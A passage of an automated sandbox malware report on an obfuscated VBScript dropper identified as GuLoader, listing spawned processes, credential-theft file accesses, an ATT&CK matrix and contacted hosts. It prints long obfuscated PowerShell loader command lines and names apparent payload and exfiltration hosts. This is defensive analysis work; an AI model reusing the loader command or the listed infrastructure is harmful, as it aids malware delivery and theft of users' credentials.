gafselafsfnkpr,iniinnantos mogsirspufiple)al;sy[brduplablseipomsupteobarbltgl(af`"""prkcoexerbanfleaflsy3br2ma`"""un)tr]hepnaunobcolulirecud srsdettharotkuiiscph grebexfrtgeesprminvi ciifinwotde stvfaipsrzotthumiaoplstaarlunlagogrcbo(daisansytaf eqvep1sy,hoidenoxtst unvme2be,trikonkotro skvfl3wi,foimongatfi stvmi4ch)be;tu[padatlbglopikomphplaobarsptwa(ma`"""thijamremde3ba2vi.hedsolsalba`"""fe)br]sepluuenbafldeihocsk lushytviaantkoipoczr noedrxurtclefardonbl heibanbrtxe hviblmrhmagskredetevsmatfiaratuduansduwanirunkeddioopwtrpbroanspu(coiunnditba neppoasklskaen,chirenxetal skrpyainzne)me;bi[vadrelrhlanisemifpouochrfrtde(ti`"""omahydwivreafapgriph3sn2mi.spdnilpllvu`"""ep)un]vepclussbgelreiafcfl drslgtmiaertpaiopcna shesixcytopegerbensu unistntitak baisnntrisotmaiscagrlpaiejzcoeanakactalbe(poipunhntru tectioaclba,aaisynmetmi leupindeapr,afimenretas fafmelfroteporpol2na0ma1sn)mi;in[dedsalpalslichmnoperophreutsc(pa`"""engsvdtaiol3re2so`"""ud)qu]fiphyuskbadlmaigucgi ocsudtlaamotreifrcsk ijewixaxtqueunrhanbo geicinmatsa husseeratbewedilinbldenomewfuepexnotbrestxpl(slisannvtge biddaudacfl,buityncetto udhtoelanhubhuldy,anibenoutti moskuibrdraecotcaafo,isitinthtub afaulpfrpisatosis)pa;uf[audtilcalafiscmbapomoikrhetom(un`"""mygprdalipa3an2tr`"""un)th]ropjoucebmalfliblcbl agslrtpyabethjicocul taevoxfotafenoralnby coiaunittha nautrnnorigegeakelnoivazanestosjbenjsieopcfrtun(leihjnuntki rvhnoobiwbeeframanhe)su;sp[caddiludlplibemfrpnooegrditde(ce`"""coudesag
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skolegaardene = """reabedsaddi-fitgeysjpsyean de-chtheytepaneladreeopfprinonmiiprtsainooscnka da'kourisfoiudnmygsy sysimyinsofttretumok;suustsnyisunbigdr trsmiyassdatdeeprmti.dormiumansotcoigamduebi.boiannsotpheoprinoudptesdeeomrgovstiknctredesfo;oppsiupabfolvaiafcgl elsshtfiabathvicocot dacunlryadzsspsor sirchepraudbstrgiisidadgpaenodat1ch in{cr[fjddrladlsqihemtapkoobervatde(ne`"""sowowihansamblmba.dedsalbalin`"""bi)sg]koppeuasbfolunihocmy prsgrtunasetinistcsi haenexsktbreporfenge uniunnartma homcaimbdsaisuotjulgtnoozipfoejrnxs(smiornbutbr pokprvabatalmoibe,tiigansatth brkatovinte,zailunditad korruiovnpegsaeatdth,rribantrtde spuounpywfoohe,hoiknngetha kouwidgrere)co;as[mudtulallreithmnopblobrrfitne(ud`"""sekuneserobnomebilhl3up2te`"""he)av]riparufuboclfiicucma assemtsaadrtapifrctu raestxditkievermenpr jiifanovtlo arlmoopecviaaulprsunhcarpoihunsvkde(ouiunnhitst resdycpuounrtupgribr,whivendotst stnsasfikovematimnup)eu;fg[gudhylanlfuipemafpleowirmutra(kh`"""vekbieemradnpueanlnl3ek2bl`"""sp)pe]repgeurebprlreiracst desbettaamatfiifocom shefaxpitdieunrtanko blisunkatke scsarecatancudomombomsisditcaazatamere(unismnextse cokcuobefaltsmaaf,naiafnlatsu scslatkaohorhortrybu)sk;kr[lidstlimlcuihomekptaorkrbrtsh(pu`"""pskfeeskrannopeunlbi3sp2ut`"""va)gr]goporupabovlupishcsu vesbetlaaistptisncen puebuxagtcoeunrcanue alimonvetce trhleesaaslpjacdyrsiediaafttiedr(iligrnudten scndoedocwirhiosapbe,biivonsitdo gafselafsfnkpr,iniinnantos mogsirspufiple)al;sy[brduplablseipomsupteobarbltgl(af`"""prkcoexerbanfleaflsy3br2ma`"""un)tr]hepnaunobcolulirecud srsdettharotkuiiscph grebexfrtgeesprminvi ciifinwotde stvfaipsrzotthumiaoplstaarlunlagogrcbo(daisansytaf eqvep1sy,hoidenoxtst unvme2be,trikonkotro skvfl3wi,foimongatfi stvmi4ch)be;tu[padatlbglopikomphplaobarsptwa(ma`"""thijamremde3ba2vi.hedsolsalba`"""fe)br]sepluuenbafldeihocsk lushytviaantkoipoczr noedrxurtclefardonbl heibanbrtxe hviblmrhmagskredetevsmatfiaratuduansduwanirunkeddioopwtrpbroanspu(coiunnditba neppoasklskaen,chirenxetal skrpyainzne)me;bi[vadrelrhlanisemifpouochrfrtde(ti`"""omahydwivreafapgriph3sn2mi.spdnilpllvu`"""ep)un]vepclussbgelreiafcfl drslgtmiaertpaiopcna shesixcytopegerbensu unistntitak baisnntrisotmaiscagrlpaiejzcoeanakactalbe(poipunhntru tectioaclba,aaisynmetmi leupindeapr,afimenretas fafmelfroteporpol2na0ma1sn)mi;in[dedsalpalslichmnoperophreutsc(pa`"""engsvdtaiol3re2so`"""ud)qu]fiphyuskbadlmaigucgi ocsudtlaamotreifrcsk ijewixaxtqueunrhanbo geicinmatsa husseeratbewedilinbldenomewfuepexnotbrestxpl(slisannvtge biddaudacfl,buityncetto udhtoelanhubhuldy,anibenoutti moskuibrdraecotcaafo,isitinthtub afaulpfrpisatosis)pa;uf[audtilcalafiscmbapomoikrhetom(un`"""mygprdalipa3an2tr`"""un)th]ropjoucebmalfliblcbl agslrtpyabethjicocul taevoxfotafenoralnby coiaunittha nautrnnorigegeakelnoivazanestosjbenjsieopcfrtun(leihjnuntki rvhnoobiwbeeframanhe)su;sp[caddiludlplibemfrpnooegrditde(ce`"""coudesag
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: Yara matchFile source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation
          Path Interception1
          Access Token Manipulation
          11
          Disable or Modify Tools
          2
          OS Credential Dumping
          1
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Exfiltration Over Alternative Protocol
          1
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts421
          Scripting
          Boot or Logon Initialization Scripts11
          Process Injection
          1
          Deobfuscate/Decode Files or Information
          1
          Credentials in Registry
          115
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Native API
          Logon Script (Windows)Logon Script (Windows)421
          Scripting
          Security Account Manager311
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration2
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts21
          Command and Scripting Interpreter
          Logon Script (Mac)Logon Script (Mac)2
          Obfuscated Files or Information
          NTDS1
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer22
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud Accounts1
          PowerShell
          Network Logon ScriptNetwork Logon Script1
          Masquerading
          LSA Secrets231
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common231
          Virtualization/Sandbox Evasion
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Access Token Manipulation
          DCSync1
          Remote System Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
          Process Injection
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 755115 Sample: Richiesta urgente.vbs Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 38 Multi AV Scanner detection for domain / URL 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Yara detected GuLoader 2->42 44 5 other signatures 2->44 8 wscript.exe 1 1 2->8         started        process3 signatures4 54 VBScript performs obfuscated calls to suspicious functions 8->54 56 Wscript starts Powershell (via cmd or directly) 8->56 58 Obfuscated command line found 8->58 60 Very long command line found 8->60 11 powershell.exe 23 8->11         started        15 cmd.exe 1 8->15         started        process5 file6 32 C:\Users\user\AppData\...\2vgl23kr.cmdline, Unicode 11->32 dropped 62 Tries to detect Any.run 11->62 17 CasPol.exe 15 11 11->17         started        21 csc.exe 3 11->21         started        24 conhost.exe 11->24         started        26 conhost.exe 15->26         started        signatures7 process8 dnsIp9 34 qwedft.gq 162.240.62.179, 49709, 80 UNIFIEDLAYER-AS-1US United States 17->34 36 ftp.mcmprint.net 185.31.121.136, 21, 49711 RAX-ASBG Bulgaria 17->36 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->46 48 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->48 50 Tries to steal Mail credentials (via file / registry access) 17->50 52 5 other signatures 17->52 30 C:\Users\user\AppData\Local\...\2vgl23kr.dll, PE32 21->30 dropped 28 cvtres.exe 1 21->28         started        file10 signatures11 process12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          ftp.mcmprint.net10%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://crl.m0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
          http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://crl.micr0%URL Reputationsafe
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi0%Avira URL Cloudsafe
          http://3LpbHlMRrrHdHc2KU.net0%Avira URL Cloudsafe
          http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi0%VirustotalBrowse
          ftp://ftp.mcmprint.netnoffice0%Avira URL Cloudsafe
          http://OowQOv.com0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          qwedft.gq
          162.240.62.179
          truefalse
            unknown
            ftp.mcmprint.net
            185.31.121.136
            truefalseunknown
            NameMaliciousAntivirus DetectionReputation
            http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asifalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://127.0.0.1:HTTP/1.1CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            low
            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://crl.mpowershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://3LpbHlMRrrHdHc2KU.netCasPol.exe, 0000000A.00000002.836359577.000000001DBDA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.836857074.000000001DC27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.734109094.0000000001621000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://go.micropowershell.exe, 00000003.00000002.751015129.0000000004FA0000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                ftp://ftp.mcmprint.netnofficeCasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://OowQOv.comCasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.micrpowershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
